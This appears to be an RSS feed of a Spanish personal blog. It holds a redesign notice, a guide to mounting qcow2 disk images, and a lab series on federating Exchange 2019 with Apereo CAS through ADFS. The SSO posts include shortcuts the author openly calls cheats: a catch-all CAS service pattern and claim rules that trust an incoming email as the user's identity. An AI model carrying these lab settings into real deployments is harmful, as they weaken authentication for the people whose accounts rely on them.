<?xml version="1.0" encoding="utf-8" standalone="yes"?><?xml-stylesheet href="/feed_style.xsl" type="text/xsl"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="https://www.rssboard.org/media-rss">
  <channel>
    <title>El blog de Ignacio</title>
    <link>https://www.igalvan.es/</link>
    <description>Recent content on El blog de Ignacio</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>es</language>
    <copyright>Ignacio Galván Vitas</copyright>
    <lastBuildDate>Wed, 11 Feb 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://www.igalvan.es/index.xml" rel="self" type="application/rss+xml" /><icon>https://www.igalvan.es/logo.svg</icon>
    
    
    <item>
      <title>Nuevo lavado de cara del blog</title>
      <link>https://www.igalvan.es/posts/de-vuelta-en-2026/</link>
      <pubDate>Wed, 11 Feb 2026 00:00:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/de-vuelta-en-2026/</guid>
      <description><![CDATA[<p>Después de bastante tiempo sin actividad, he aprovechado para darle al blog un <strong>nuevo lavado de cara</strong>, tanto a nivel visual como técnico. No se trata solo de un cambio estético, sino de una revisión completa de la base sobre la que se apoya el sitio.</p>
<p>El principal cambio ha sido el <strong>paso a una plataforma estática basada en Hugo</strong>, con una infraestructura mucho más sencilla y predecible. El contenido se gestiona directamente desde repositorios Git y el resultado es HTML estático servido sin capas intermedias, lo que reduce complejidad, dependencias y puntos de fallo. Menos servicios, menos mantenimiento y tiempos de carga prácticamente inmediatos.</p>
<p>Junto con el cambio de plataforma, he actualizado el <strong>tema visual</strong>, optando por un diseño más limpio y funcional. La prioridad ha sido la legibilidad, el rendimiento y una estética discreta, sin artificios innecesarios. La idea es que el diseño acompañe al contenido y no al revés, y que el blog sea cómodo tanto para leer como para escribir.</p>
<p>A nivel de despliegue, el sitio se publica directamente desde código, separando claramente las <strong>fuentes</strong> del <strong>contenido generado</strong>. El resultado final se sirve como contenido estático, con dominio propio y HTTPS automático, eliminando dependencias dinámicas y facilitando la portabilidad del sitio en el futuro.</p>
<p>Este rediseño no implica una vuelta con una frecuencia fija de publicación. La intención es <strong>retomar el blog con calma</strong>, escribiendo cuando tenga algo que merezca la pena documentar o compartir. Las entradas serán previsiblemente <strong>esporádicas</strong>, en muchos casos técnicas, otras más personales, y otras simplemente notas o reflexiones que me resulte útil dejar por escrito.</p>
<p>El blog sigue siendo, ante todo, un espacio personal. Este cambio es una forma de simplificarlo, mantenerlo vivo y dejarlo listo para cuando vuelva a apetecer escribir.</p>
<p>Seguimos.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Rundeck integrado con Apereo CAS (Parte 1)</title>
      <link>https://www.igalvan.es/posts/rundeck-apereo-cas-parte-1/</link>
      <pubDate>Tue, 11 Oct 2022 19:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/rundeck-apereo-cas-parte-1/</guid>
      <description><![CDATA[<p>Rundeck se ha convertido en una herramienta imprescindible y que me permite automatizar una enorme cantidad de procesos de una forma sencilla. Si tengo que buscarle un pero es que como todo software que tiene una versión de fuentes abiertas y otra versión &ldquo;profesional&rdquo; de código cerrado y licencia muy cara, es que las mejores opciones, evidentemente, siempre están en la versión de pago. De casi todas ellas se puede prescindir pero hay una que siempre me frustra cuando no está disponible, el SSO.</p>
<p>Así que hoy vamos a ver cómo integrar nuestro SSO de cabecera con esta herramienta a través de un módulo de Apache y de paso vamos a proveerle de un proxy inverso que nos dé encriptación TLS de las comunicaciones.</p>
<h2 id="listado-de-episodios">Listado de episodios</h2>
<ul>
<li><a href="/2022/10/11/rundeck-apereo-cas-parte-1.html">Parte 1</a>.</li>
</ul>
<h2 id="esquema-del-laboratorio">Esquema del laboratorio</h2>
<p>Como siempre, el primer paso es detallar nuestra arquitectura.</p>
<p>Como plataforma de virtualización se ha utilizado KVM sobre Debian 11 pero se puede hacer con cualquier otra como VirtualBox, VMWare o Hyper-V.</p>
<p><img src="/images/2022/20221011-rundeck-apereo-cas-parte-1-img_1.png" alt="image-20221011-rundeck-apereo-cas-parte-1-img_1"></p>
<p>Todos los servidores están desplegados sobre CentOS 7.9 de 64 bits excepto el desktop que es una Debian 11 de 64 bits. En cuanto al resto de componentes:</p>
<ul>
<li>El Apache desplegado es el propio del repositorio estándar de CentOS.</li>
<li>Rundeck Community se ha desplegado en la version 4.7.0.</li>
<li>389DS se ha desplegado en la versión 1.3.10.</li>
<li>Apereo CAS se ha desplegado desde la plantilla de CAS overlay en su versión 6.6.0.</li>
</ul>
<p>Para el direccionamiento de red se ha usado un segmento de red de clase C en el segmente 192.168.122.0/24 con direccionamiento estático asignado a las máquinas.</p>
<p>La distribución final de los equipos en el laboratorio será la siguiente:</p>
<ul>
<li>Servidor 389DS. 2 GB de RAM, 2 vCPU y 40 GB de disco. Dirección IP: 192.168.122.11.</li>
<li>Servidor Apereo CAS. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 192.168.122.12.</li>
<li>Servidor Rundeck y Apache. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 192.168.122.13.</li>
<li>Estación de trabajo. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 192.168.122.2.</li>
</ul>
<p>Como siempre voy a suponer que sabéis cómo instalar los sistemas operativos, 389DS, Apereo CAS y Rundeck por lo que no voy a explicar esta parte. Al fin y al cabo si estáis leyendo esto entiendo que si estás leyendo este artículo es porque ya sabes todo esto.</p>
<p>Hasta el siguiente episodio.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Montar un fichero qcow2 en Linux</title>
      <link>https://www.igalvan.es/posts/montar-qcow2-en-linux/</link>
      <pubDate>Sun, 27 Mar 2022 19:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/montar-qcow2-en-linux/</guid>
      <description><![CDATA[<p>Hoy vamos a hacer algo sencillo pero que siempre se me olvida como se hace cuando más lo necesito, montar un volumen qcow2 de una máquina virtual para obtener alguno fichero o información que se encuentra dentro.</p>
<h2 id="activar-el-modulo-nbd">Activar el modulo NBD</h2>
<p>Lo primero es cargar el módulo NBD que nos permitirá conectar el fichero qcow2 como un dispositivo de disco más del sistema.</p>
<p>{% highlight bash %}</p>
<p>igalvit@server:/vms/kvm$ sudo modprobe nbd max_part=8</p>
<p>{% endhighlight %}</p>
<h2 id="montar-el-fichero-qcow2">Montar el fichero qcow2</h2>
<p>Una vez que ya tenemos el módulo cargado tenemos que conectar el fichero qcow2, en mi caso se trata de un disco virtual de una máquina CentOS 7.</p>
<p>{% highlight bash %}</p>
<p>igalvit@server:/vms/kvm$ sudo qemu-nbd &ndash;connect=/dev/nbd0 /vms/kvm/centos7.qcow2</p>
<p>{% endhighlight %}</p>
<h2 id="ver-las-particiones-disponibles">Ver las particiones disponibles</h2>
<p>En este punto ya hemos montado el disco pero no sabemos qué contiene, así que vamos a visualizarlo para posteriormente elegir la partición que nos interesa.</p>
<p>{% highlight bash %}</p>
<p>igalvit@server:/vms/kvm$ sudo fdisk /dev/nbd0 -l
Disco /dev/nbd0: 20 GiB, 21474836480 bytes, 41943040 sectores
Unidades: sectores de 1 * 512 = 512 bytes
Tamaño de sector (lógico/físico): 512 bytes / 512 bytes
Tamaño de E/S (mínimo/óptimo): 512 bytes / 512 bytes
Tipo de etiqueta de disco: dos
Identificador del disco: 0x000a1f9c</p>
<p>Dispositivo Inicio Comienzo    Final Sectores Tamaño Id Tipo
/dev/nbd0p1 *          2048  2099199  2097152     1G 83 Linux
/dev/nbd0p2         2099200 41943039 39843840    19G 8e Linux LVM</p>
<p>{% endhighlight %}</p>
<h2 id="montar-la-partición">Montar la partición</h2>
<p>En nuestro caso se trata de un volumen LVM por lo que lleva un poco más de trabajo del habitual.</p>
<p>{% highlight bash %}</p>
<p>igalvit@server:/vms/kvm$ sudo vgscan
Found volume group &ldquo;centos_centos7&rdquo; using metadata type lvm2
Found volume group &ldquo;ubuntu_vg&rdquo; using metadata type lvm2</p>
<p>igalvit@server:/vms/kvm$ sudo vgchange -ay centos_centos7
2 logical volume(s) in volume group &ldquo;centos_centos7&rdquo; now active</p>
<p>igalvit@server:/vms/kvm$ sudo lvs
LV   VG             Attr       LSize   Pool Origin Data%  Meta%  Move Log Cpy%Sync Convert
root centos_centos7 -wi-a&mdash;&ndash; &lt;17,00g                                                 <br>
swap centos_centos7 -wi-a&mdash;&ndash;   2,00g                                                 <br>
root ubuntu_vg      -wi-ao&mdash;- 921,00g                                                 <br>
swap ubuntu_vg      -wi-ao&mdash;-  &lt;9,28g</p>
<p>igalvit@server:/vms/kvm$ sudo mount /dev/centos_centos7/root /mnt -o ro,user</p>
<p>{% endhighlight %}</p>
<h2 id="visualizar-el-contenido-de-un-fichero">Visualizar el contenido de un fichero</h2>
<p>Como esto es una prueba no vamos a hacer nada complicado, simplemente vamos a visualizar el fichero de la versión de la distribución de CentOS instalada.</p>
<p>{% highlight bash %}</p>
<p>igalvit@server:/vms/kvm$ cd /mnt</p>
<p>igalvit@server:/mnt$ ls
bin   dev  home  lib64  mnt  proc  run   srv  tmp  var
boot  etc  lib   media  opt  root  sbin  sys  usr</p>
<p>igalvit@server:/mnt$ cat etc/redhat-release
CentOS Linux release 7.9.2009 (Core)</p>
<p>{% endhighlight %}</p>
<h2 id="desmontarlo-todo">Desmontarlo todo</h2>
<p>Una vez terminada la tareas ha llegado la hora de recoger velas.</p>
<p>{% highlight bash %}</p>
<p>igalvit@server:/$ sudo umount /mnt</p>
<p>igalvit@server:/$ sudo vgchange -an centos_centos7
0 logical volume(s) in volume group &ldquo;centos_centos7&rdquo; now active</p>
<p>igalvit@server:/$ sudo qemu-nbd &ndash;disconnect /dev/nbd0
/dev/nbd0 disconnected</p>
<p>{% endhighlight %}</p>
<p>Y con esto damos por finalizado este artículo.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Integrar Exchange 2019 con Apereo CAS mediante ADFS (Parte 5)</title>
      <link>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-5/</link>
      <pubDate>Fri, 25 Mar 2022 17:20:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-5/</guid>
      <description><![CDATA[<p>Hoy llegamos a la parte 5 donde veremos alguna prueba del resultado final y algunos cambios interesantes que pueden mejorar la experiencia de usuario.</p>
<h2 id="acceso-al-owa">Acceso al OWA</h2>
<p>El acceso al OWA lo haremos como siempre, accediendo por la URL que hayamos definido para este servicio que en nuestro caso es <a href="https://exlab.olimpo.lab/owa">https://exlab.olimpo.lab/owa</a>.</p>
<p>Cuando accedamos en vez de mostrarnos el formulario clásico del OWA veremos una página llamada Home Realm Discovery donde deberemos seleccionar el proveedor que vamos a usar para autenticarnos, que en nuestro caso será apereolab.olimpo.lab.</p>
<p><img src="/images/2022/20220325-exchange-adfs-apereo-cas-parte-5-img_2.png" alt="image-20220325-exchange-adfs-apereo-cas-parte-5-img_2"></p>
<p>Al hacer eso accederemos al formulario del CAS donde introducieremos las credenciales de acceso. Bastante sencillo, ¿no?</p>
<p><img src="/images/2022/20220325-exchange-adfs-apereo-cas-parte-5-img_3.png" alt="image-20220325-exchange-adfs-apereo-cas-parte-5-img_3"></p>
<p>Pues vamos a introducir una mejora, en realidad a nosotros ya no nos interesa que el usuario se valide mediante Directorio Activo o que tenga que seleccionar un proveedor de identididades por que con estos dos comandos de PowerShell vamos a forzar que el proveedor sea el CAS.</p>
<p>{% highlight posh %}
Set-AdfsRelyingPartyTrust -TargetName &ldquo;Outlook on the web&rdquo; -ClaimsProviderName &ldquo;apereolab.olimpo.lab&rdquo;
Set-AdfsRelyingPartyTrust -TargetName &ldquo;Exchange Control Panel&rdquo; -ClaimsProviderName &ldquo;apereolab.olimpo.lab&rdquo;
{% endhighlight %}</p>
<h2 id="una-mejora-de-última-hora">Una mejora de última hora</h2>
<p>Ya había terminado de redactar este tutorial cuando realizando un par de pruebas encontré la forma de evitar que al cerrar sesión se muestre este mensaje tan feo.</p>
<p><img src="/images/2022/20220325-exchange-adfs-apereo-cas-parte-5-img_1.png" alt="image-20220325-exchange-adfs-apereo-cas-parte-5-img_1"></p>
<p>Todo lo que hay que hacer es editar el fichero <code>cas.properties</code> de nuestro CAS y añadir la siguiente línea:</p>
<p>{% highlight conf %}
cas.authn.saml-idp.logout.sign-logout-response=true
{% endhighlight %}</p>
<p>Reiniciamos el CAS y listo, problema solucionado.</p>
<p><img src="/images/2022/20220325-exchange-adfs-apereo-cas-parte-5-img_4.png" alt="image-20220325-exchange-adfs-apereo-cas-parte-5-img_4"></p>
<p>Y con esto damos por terminado este tutorial. Cualquier comentario, ya sabéis, a través de mis redes sociales.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Integrar Exchange 2019 con Apereo CAS mediante ADFS (Parte 4)</title>
      <link>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-4/</link>
      <pubDate>Tue, 22 Mar 2022 16:19:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-4/</guid>
      <description><![CDATA[<p>Hoy llegamos a la parte 4 donde explicaremos la configuración de la parte de Apereo CAS. En nuestro caso hemos utilizado, como habíamos comentando anteriormente, el CAS Overlay porque simplica el trabajo de configuración y despliegue del Apereo CAS. Suponiendo que hayas descargado la última versión desde GitHub, vamos a tocar los siguientes ficheros:</p>
<ul>
<li>/etc/cas/config/cas.properties.</li>
<li>/etc/cas/services/cas_saml-100.json.</li>
<li>/etc/cas/services/adfs-101.json.</li>
<li>/etc/cas/metadata/adfs-metadata.xml.</li>
</ul>
<h2 id="antes-de-comenzar">Antes de comenzar</h2>
<p>En el fichero build.gradle del CAS Overlay se han añadido las implementaciones de IDP, JSON Service Registry y LDAP. Posteriormente hemos ejecutado el comando <code>./gradlew clean build</code> para crear el fichero WAR que usaremos. Para ejecutar el CAS hemos usado el comando <code>java -jar build/lib/cas.war</code></p>
<p>También tendremos que crear un usuario que nos permita autenticar contra Directorio Activo para poder obtener la información de los usuarios. En el caso de este laboratorio el usuario creado es &ldquo;APEREO USER&rdquo;.</p>
<h2 id="fichero-etccasconfigcasproperties">Fichero /etc/cas/config/cas.properties</h2>
<p>{% highlight conf %}
as.server.name=https://apereolab.olimpo.lab:8443
cas.server.prefix=${cas.server.name}/cas
logging.config=file:/etc/cas/config/log4j2.xml
cas.authn.saml-idp.core.entity-id=https://apereolab.olimpo.lab/idp
cas.service-registry.json.location: file:/etc/cas/services
cas.authn.ldap[0].order=1
cas.authn.ldap[0].name=AD-OLIMPO
cas.authn.ldap[0].ldap-url=ldap://exlab.olimpo.lab:389
cas.authn.ldap[0].base-dn=dc=olimpo,dc=lab
cas.authn.ldap[0].bind-dn=CN=APEREO USER,OU=Administrators,DC=olimpo,DC=lab
cas.authn.ldap[0].bind-credential=&lt;TU_PASSWORD&gt;
cas.authn.ldap[0].type=AUTHENTICATED
cas.authn.ldap[0].subtreeSearch=true
cas.authn.ldap[0].searchFilter=(&amp;(objectClass=person)(sAMAccountName={user}))
cas.authn.ldap[0].principalAttributeList=sAMAccountName,mail,userPrincipalName
{% endhighlight %}</p>
<h2 id="fichero-etccasservicescas_saml-100json">Fichero /etc/cas/services/cas_saml-100.json</h2>
<p>Aquí nuevamente hemos hecho un poco de trampas para que capture cualquier URL.</p>
<p>{% highlight conf %}
{
&ldquo;@class&rdquo;: &ldquo;org.apereo.cas.services.RegexRegisteredService&rdquo;,
&ldquo;serviceId&rdquo;: &ldquo;http://.+&rdquo;,
&ldquo;name&rdquo; : &ldquo;cas_saml&rdquo;,
&ldquo;id&rdquo; : 100,
&ldquo;evaluationOrder&rdquo; : 100
}
{% endhighlight %}</p>
<h2 id="fichero-etccasservicesadfs-101json">Fichero /etc/cas/services/adfs-101.json</h2>
<p>{% highlight conf %}
{
&ldquo;@class&rdquo;: &ldquo;org.apereo.cas.support.saml.services.SamlRegisteredService&rdquo;,
&ldquo;serviceId&rdquo;: &ldquo;<a href="http://fs.olimpo.lab/adfs/services/trust%22">http://fs.olimpo.lab/adfs/services/trust&quot;</a>,
&ldquo;name&rdquo;: &ldquo;adfs&rdquo;,
&ldquo;id&rdquo;: 101,
&ldquo;evaluationOrder&rdquo;: 101,
&ldquo;description&rdquo;: &ldquo;adfs lab service&rdquo;,
&ldquo;logoutType&rdquo;: &ldquo;NONE&rdquo;,
&ldquo;attributeReleasePolicy&rdquo;: {
&ldquo;@class&rdquo;: &ldquo;org.apereo.cas.services.ReturnAllAttributeReleasePolicy&rdquo;,
},
&ldquo;usernameAttributeProvider&rdquo; : {
&ldquo;@class&rdquo; : &ldquo;org.apereo.cas.services.PrincipalAttributeRegisteredServiceUsernameProvider&rdquo;,
&ldquo;usernameAttribute&rdquo; : &ldquo;mail&rdquo;,
},
&ldquo;requiredNameIdFormat&rdquo;: &ldquo;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress&rdquo;,
&ldquo;metadataLocation&rdquo;: &ldquo;/etc/cas/metadata/adfs-metadata.xml&rdquo;,
&ldquo;signAssertions&rdquo;: true,
&ldquo;signResponses&rdquo;: false
}
{% endhighlight %}</p>
<h2 id="fichero-etccasmetadataadfs-metadataxml">Fichero /etc/cas/metadata/adfs-metadata.xml</h2>
<p>Este fichero se obtiene desde ADFS. Concretamente se debe acceder a la ruta <a href="https://fs.olimpo.lab/FederationMetadata/2007-06/FederationMetadata.xml">https://fs.olimpo.lab/FederationMetadata/2007-06/FederationMetadata.xml</a> y descargar el fichero XML para luego copiarlo en esta ruta.</p>
<h2 id="directorio-etccassaml">Directorio /etc/cas/saml</h2>
<p>Contiene la definición del IDP, certificado de firma, encriptación, etc.</p>
<p>{% highlight shell %}
ls
idp-encryption.crt  idp-encryption.key  idp-metadata.xml  idp-signing.crt  idp-signing.key  metadata-backups
{% endhighlight %}</p>
<p>Ya en la parte siguiente veremos algunas pruebas de funcionamiento y algunas mejoras que se pueden hacer para que todo vaya más fluido. Hasta el próximo episodio.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Integrar Exchange 2019 con Apereo CAS mediante ADFS (Parte 3)</title>
      <link>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-3/</link>
      <pubDate>Fri, 18 Mar 2022 16:19:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-3/</guid>
      <description><![CDATA[<p>Hoy llegamos a la parte 3 donde completaremos la configuración de la parte de ADFS realizado la parte correspondiente a los proveedores de confianza de notificaciones o Claims Providers Trusts.</p>
<h2 id="claims-providers-trusts">Claims Providers Trusts</h2>
<p>Hemos llamado &ldquo;apereolab.olimpo.lab&rdquo; a la relación de confianza y para su generación hemos utilizado los metadatos públicados en la siguiente URL del CAS <a href="https://apereolab.olimpo.lab:8443/cas/idp/metadata">https://apereolab.olimpo.lab:8443/cas/idp/metadata</a>. Esto nos facilita mucho el trabajo porque ya se encarga de realizar el resto de la configuración de esta relación de confianza.</p>
<p>A continuación mostramos dos capturas de pantalla de las dos pestañas más importantes. Recuerda que esta configuración puede variar en función de la configuración que tengas en el Apereo CAS.</p>
<p>La primera captura es de la pestaña Monitoring donde figura la URL de los metadatos junto con la configuración para que se actualice automáticamente la información.</p>
<p><img src="/images/2022/20220318-exchange-adfs-apereo-cas-parte-3-img_3.png" alt="image-20220318-exchange-adfs-apereo-cas-parte-3-img_3"></p>
<p>La segunda captura muestra la configuración de la pestaña que contiene los puntos finales o Endpoints.</p>
<p><img src="/images/2022/20220318-exchange-adfs-apereo-cas-parte-3-img_4.png" alt="image-20220318-exchange-adfs-apereo-cas-parte-3-img_4"></p>
<h2 id="acceptance-transform-rules">Acceptance Transform Rules</h2>
<p>Solo vamos a tener un regla de transformación de notificación entrante para NameID que va a ser de tipo Email e indicaremos que pase a través todos los valores de las notificaciones. Recuerda que anteriormente ya hemos comentado que nos vamos a fiar que desde Apereo nos van a enviar una dirección de correo electrónico que existe en el Exchange Server y que además va a coincidir con el UPN de un usuario. Sí, es un poco de trampa, lo sé. 😋</p>
<p><img src="/images/2022/20220318-exchange-adfs-apereo-cas-parte-3-img_2.png" alt="image-20220318-exchange-adfs-apereo-cas-parte-3-img_2"></p>
<p>Por si quereis echarle un vistazo a la consulta que se genera, es la siguiente:</p>
<p>{% highlight query %}
c:[Type == &ldquo;http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier&rdquo;, Properties[&ldquo;http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/format&rdquo;] == &ldquo;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress&rdquo;]
=&gt; issue(claim = c);
{% endhighlight %}</p>
<p>Y ya con esto nos vemos en el próximo capítulo donde hablaremos de la parte del Apereo CAS.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Integrar Exchange 2019 con Apereo CAS mediante ADFS (Parte 2)</title>
      <link>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-2/</link>
      <pubDate>Thu, 17 Mar 2022 17:43:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-2/</guid>
      <description><![CDATA[<p>Bueno ya vimos en la parte 1 la descripción del laboratorio donde vamos a implementar nuestro nuevo Exchange Server autenticado contra el CAS de Apereo a través de ADFS.</p>
<p>Vamos a suponer que ya tienes un controlador de dominio operativo, en nuestro caso sobre el dominio OLIMPO y que además ya cuentas con al menos un Exchange Server 2019 en marcha, recuerda que en este laboratorio está integrado en el mismo servidor que el controlador de dominio, es decir, en exlab.olimpo.lab.</p>
<h2 id="configuración-de-la-federación-adfs">Configuración de la federación ADFS</h2>
<p>La federación de mi laboratorio está desplegada sobre el servidor adfslab.olimpo.lab y tiene la configuración que se muestra en la siguiente captura. Realmente se trata de la configuración por defecto donde el único cambio reseñable es que la federación tiene como nombre <a href="http://fs.olimpo.lab">http://fs.olimpo.lab</a> simplemente para diferenciarla del nombre del servidor que la alberga.</p>
<p><img src="/images/2022/20220317-exchange-adfs-apereo-cas-parte-2-img_1.png" alt="image-20220317-exchange-adfs-apereo-cas-parte-2-img_1"></p>
<h2 id="relaying-trust-parties">Relaying Trust Parties</h2>
<p>En nuestro caso se van a generar dos relaciones de relaciones de confianza, una para Outlook Web App (OWA) y la otra para Exchange Control Panel (ECP). A la primera le hemos puesto el nombre de &ldquo;Outlook on the web&rdquo; y a la segunda &ldquo;Exchange Control Panel&rdquo;.</p>
<p>Recuerda que estos son los únicos servicios de Exchange que se pueden federar ya que tanto EAS como Outlook deben autenticarse mediante Directorio Activo.</p>
<h3 id="outlook-on-the-web">Outlook on the web</h3>
<p>Como se puede observa la segunda relación de confianza es casi igual que la primera solo que para el ECP. En la siguiente captura se puede observar la configuración de los identificadores que solo es uno hacia la URL del OWA.</p>
<p><img src="/images/2022/20220317-exchange-adfs-apereo-cas-parte-2-img_3.png" alt="image-20220317-exchange-adfs-apereo-cas-parte-2-img_3"></p>
<p>En esta captura se puede observar la configuración de los puntos finales. En realidad solo tenemos uno de tipo POST hacia la URL de OWA.</p>
<p><img src="/images/2022/20220317-exchange-adfs-apereo-cas-parte-2-img_4.png" alt="image-20220317-exchange-adfs-apereo-cas-parte-2-img_4"></p>
<h3 id="exchange-control-panel">Exchange Control Panel</h3>
<p>Como se puede observa la segunda relación de confianza es casi igual que la primera solo que para el ECP. En la siguiente captura se puede observar la configuración de los identificadores que en este caso también es solo uno hacia la URL del ECP.</p>
<p><img src="/images/2022/20220317-exchange-adfs-apereo-cas-parte-2-img_5.png" alt="image-20220317-exchange-adfs-apereo-cas-parte-2-img_5"></p>
<p>En esta captura se puede observar la configuración de los puntos finales. Como en el primer caso solo tenemos uno de tipo POST hacia la URL del ECP.</p>
<p><img src="/images/2022/20220317-exchange-adfs-apereo-cas-parte-2-img_6.png" alt="image-20220317-exchange-adfs-apereo-cas-parte-2-img_6"></p>
<h2 id="issuance-transform-rules">Issuance Transform Rules</h2>
<p>En las reglas de transformación de notificaciones tenemos dos reglas, una para el UPN y otra para obtener el PrimarySID mediante uan búsqueda en el repositorio de Directorio Activo. Ambas reglas son exactamente iguales en ambas relaciones de confianza por lo que solo las describiremos una vez.</p>
<p><img src="/images/2022/20220317-exchange-adfs-apereo-cas-parte-2-img_2.png" alt="image-20220317-exchange-adfs-apereo-cas-parte-2-img_2"></p>
<h3 id="regla-upn">Regla UPN</h3>
<p>En esta primera regla simplemente obtenemos la notificación entrante NameIdentifier que es de tipo email (esto lo veremos cuando configuremos el CAS) y emito una nueva notificación de tipo UPN con el valor que me llega.</p>
<p>{% highlight query %}
c:[Type == &ldquo;http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier&rdquo;]
=&gt; issue(Type = &ldquo;<a href="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn%22">http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn&quot;</a>, Value = c.Value);
{% endhighlight %}</p>
<p>Es verdad que esto es bastante deficiente y estoy confiando en que me llegue la notificación con una dirección de correo valida y que coincida con el UPN del usuario en Directorio Activo pero recuerda que esto se trata de un laboratorio para aprender.</p>
<h3 id="regla-primarysid">Regla PrimarySID</h3>
<p>En esta segunda regla aprovechamos la notificació de tipo UPN recien creada para localizar el objectSID del usuario buscandolo por el UPN y por la dirección de correo electrónico por si no somos capaces de localizarlo por el UPN.</p>
<p>{% highlight query %}
c1:[Type == &ldquo;http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier&rdquo;]
&amp;&amp; c2:[Type == &ldquo;http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn&rdquo;]
=&gt; issue(store = &ldquo;Active Directory&rdquo;, types = (&ldquo;<a href="http://schemas.microsoft.com/ws/2008/06/identity/claims/primarysid%22)">http://schemas.microsoft.com/ws/2008/06/identity/claims/primarysid&quot;)</a>, query = &ldquo;(&amp;(objectCategory=person)(objectClass=user)(|(userPrincipalName={0})(&amp;(mail={0})(!(userPrincipalName={0})))));objectSid;OLIMPO\random&rdquo;, param = c2.Value);
{% endhighlight %}</p>
<p>Aquí nuevamente hacemos un poco de truco porque estamos forzando el dominio del usuario al del laboratorio pero no he sido capaz de hacerlo funcionar de otra manera.</p>
<p>Bueno y con esto nos despedimos hasta el siguiente episodio donde veremos la parte de los proveedores de confianza de notificaciones o Claims Providers Trusts.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Integrar Exchange 2019 con Apereo CAS mediante ADFS (Parte 1)</title>
      <link>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-1/</link>
      <pubDate>Wed, 16 Mar 2022 18:15:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/exchange-adfs-apereo-cas-parte-1/</guid>
      <description><![CDATA[<p>Comenzamos una nueva serie de artículos dedicados a integrar Exchange Server 2019 con el Apereo CAS mediante ADFS. Si la pregunta es por qué, pues la respuesta es sencilla, porque se puede.</p>
<h2 id="listado-de-episodios">Listado de episodios</h2>
<p>Comencemos con el listado de todos los artículos relacionados con este tutorial.</p>
<ul>
<li><a href="/2022/03/16/exchange-adfs-apereo-cas-parte-1.html">Parte 1</a>.</li>
<li><a href="/2022/03/17/exchange-adfs-apereo-cas-parte-2.html">Parte 2</a>.</li>
<li><a href="/2022/03/18/exchange-adfs-apereo-cas-parte-3.html">Parte 3</a>.</li>
<li><a href="/2022/03/22/exchange-adfs-apereo-cas-parte-4.html">Parte 4</a>.</li>
<li><a href="/2022/03/25/exchange-adfs-apereo-cas-parte-5.html">Parte 5</a>.</li>
</ul>
<h2 id="esquema-del-laboratorio">Esquema del laboratorio</h2>
<p>Vamos a usar cuatro máquinas virtuales en este laboratorio aunque en un entorno real deberían ser al menos seis ya que he integrado el controlador de dominio con el servidor Exchange y, como no nos hacía falta para un laboratorio, no he publicado ADFS mediante un Web Application Proxy.</p>
<p>Como plataforma de virtualización se ha utilizado WMWare Workstation 16 pero se puede hacer con cualquier otra como VirtualBox, KVM o Hyper-V.</p>
<p><img src="/images/2022/20220316-exchange-adfs-apereo-cas-parte-1-img_1.png" alt="image-20220316-exchange-adfs-apereo-cas-parte-1-img_1"></p>
<p>Los servidores Windows se han montado en Windows Server 2022 Standard, la estación de trabajo en Windows 10 Pro y el servidor de Apereo en CentOS 7.9 de 64 bits.</p>
<p>Se ha utilizado Exchange Server 2019 CU11 y para la implementación del CAS de Apereo se ha utilizado la 6.0.0 obtenida del overlay descargado desde su repositorio en GitHub en la URL <a href="https://github.com/apereo/cas-overlay-template">https://github.com/apereo/cas-overlay-template</a>.</p>
<p>Para el direccionamiento de red se ha usado un segmento de red de clase C en el segmente 172.16.53.0/24 con direccionamiento estático asignado a las máquinas.</p>
<p>La distribución final de los equipos en el laboratorio será la siguiente:</p>
<ul>
<li>Controlador de dominio y Exchange Server. 6 GB de RAM, 4 vCPU y dos discos de 100 GB. Dirección IP: 172.16.53.10.</li>
<li>Servidor ADFS. 4 GB de RAM, 2 vCPU y 60 GB de disco. Dirección IP: 172.16.53.11.</li>
<li>Servidor Apereo CAS. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 172.16.53.13.</li>
<li>Estación de trabajo. 4 GB de RAM, 2vCPU y 60 GB de disco. Dirección IP: 172.16.53.20.</li>
</ul>
<p>Voy a dar por supuesto que todos sabemos instalar el sistema operativo tanto de los servidores como de la estación de trabajo y también obtener las ISO de Windows y Exchange Server por lo que no voy a explicar esta parte. Tampoco voy a detallar cómo se instala el controlador de dominio o Exchange Server porque entiendo que si estás leyendo este artículo es porque ya sabes todo esto.</p>
<p>Hasta el siguiente episodio.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Mapear unidad de red sobre SSH en Windows</title>
